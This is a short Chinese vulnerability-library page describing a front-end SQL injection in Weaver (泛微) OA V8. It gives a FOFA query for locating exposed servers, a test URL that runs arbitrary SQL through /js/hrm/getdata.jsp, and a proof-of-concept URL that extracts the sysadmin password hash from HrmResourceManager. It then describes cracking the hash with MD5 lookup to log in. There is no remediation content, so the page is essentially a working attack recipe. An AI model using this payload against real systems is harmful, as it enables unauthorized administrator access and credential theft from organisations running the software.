泛微OA8前台SQL注入 —-那个少年-漏洞文库小世界-安全文库-NGC660安全实验室

泛微OA8前台SQL注入 —-那个少年

泛微OA8前台SQL注入

0x00漏洞描述

泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限

0x01漏洞影响

泛微OA V8

0x02FOFA

app=“泛微-协同办公OA”

0x03漏洞复现

在浏览器中,构造测试URL:x.x.x.x

http://x.x.x.x/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select 38438 as id

1627811734941-9352803b-d6ef-4d2b-808f-72994ae2f022

出现上面情况证实存在漏洞

POC:

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

1627811747181-00067f14-2ae3-4bbd-a0da-2153a1c68558

查询HrmResourceManager表中的password字段,页面中返回了数据库第一条记录的值(sysadmin用户的password)通过md5解密即可得到密码

1627811760906-b6f8f125-cd4b-42f9-8138-66e210766203

成功登陆

参考链接
https://blog.csdn.net/weixin_43227251/article/details/115653646

请登录后发表评论

    请登录后查看回复内容